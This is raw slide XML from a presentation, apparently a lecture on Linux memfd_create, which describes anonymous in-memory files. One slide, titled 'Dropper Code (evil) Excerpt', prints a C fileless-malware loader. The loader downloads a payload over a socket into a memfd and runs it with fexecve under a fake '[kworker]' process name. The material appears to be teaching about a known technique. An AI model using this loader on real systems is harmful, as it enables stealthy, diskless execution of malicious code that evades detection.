              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="449070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2675467"/>
            <a:ext cx="8568951" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>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does not require a local mount-point. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>can create objects that are not associated with any filesystem and can never be linked into a filesystem. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>backing memory is anonymous memory as if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malloc</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(3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>had returned a file-descriptor instead of a pointer. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="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14</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Property 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>David Herrmann</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105230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There are no name-clashes and no global registry. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>can create multiple files with the same name and they will all be separate, independent files. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Therefore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, the name is purely for debugging purposes so it can be detected in task-dumps or the like.</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15</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Property 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>David Herrmann</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="607388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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Example</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16</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01983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1916832"/>
            <a:ext cx="8640960" cy="4680520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> main (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, char **</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, s; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 0x0100007f11110002;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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[2]= {"[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kworker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/u!0]", NULL};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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[1024];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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Connect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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>((s = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) &lt; 0) exit (1);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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(connect (s, (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sockaddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*)&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 16) &lt; 0) exit (1);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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memfd_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("a", MFD_CLOEXEC)) &lt; 0) exit (1);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while </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(1)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 </a:t>
            </a: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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>((read (s, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 1024) ) &lt;= 0) break;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write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 1024);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 </a:t>
            </a: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close </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(s);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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fexecve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, environ) &lt; 0) exit (1);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 return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" panose="020B06090202040302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17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="338328"/>
            <a:ext cx="8568952" cy="1252728"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Dropper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Code (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) Excerpt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>M0rk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25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412776"/>
            <a:ext cx="2667000"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5157192"/>
            <a:ext cx="284797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手繪多邊形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="5981700"/>
            <a:ext cx="6057900" cy="609600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 6057900"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 609600"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 6057900"/>
              <a:gd name="connsiteY1" fmla="*/ 609600 h 609600"/>
              <a:gd name="connsiteX2" fmla="*/ 6057900 w 6057900"/>
              <a:gd name="connsiteY2" fmla="*/ 609600 h 609600"/>
              <a:gd name="connsiteX3" fmla="*/ 6057900 w 6057900"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 609600"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6057900" h="609600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="609600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6057900" y="609600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6057900" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>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手繪多邊形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2997200" y="2946400"/>
            <a:ext cx="5143500" cy="3644900"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 5143500"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 3644900"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 5143500"/>
              <a:gd name="connsiteY1" fmla="*/ 279400 h 3644900"/>
              <a:gd name="connsiteX2" fmla="*/ 5143500 w 5143500"/>
              <a:gd name="connsiteY2" fmla="*/ 279400 h 3644900"/>
              <a:gd name="connsiteX3" fmla="*/ 5143500 w 5143500"/>
              <a:gd name="connsiteY3" fmla="*/ 1574800 h 3644900"/>
              <a:gd name="connsiteX4" fmla="*/ 2730500 w 5143500"/>
              <a:gd name="connsiteY4" fmla="*/ 1574800 h 3644900"/>
              <a:gd name="connsiteX5" fmla="*/ 2730500 w 5143500"/>
              <a:gd name="connsiteY5" fmla="*/ 3644900 h 364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3500" h="3644900">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="279400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5143500" y="279400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5143500" y="1574800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2730500" y="1574800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2730500" y="3644900"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>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84269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6" y="2564904"/>
            <a:ext cx="8640962" cy="4032448"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>This dropper connects to port 0x1111 of the local host.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Here we use  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> to simulate a server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>program which can store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>a </a:t>
            </a:r>
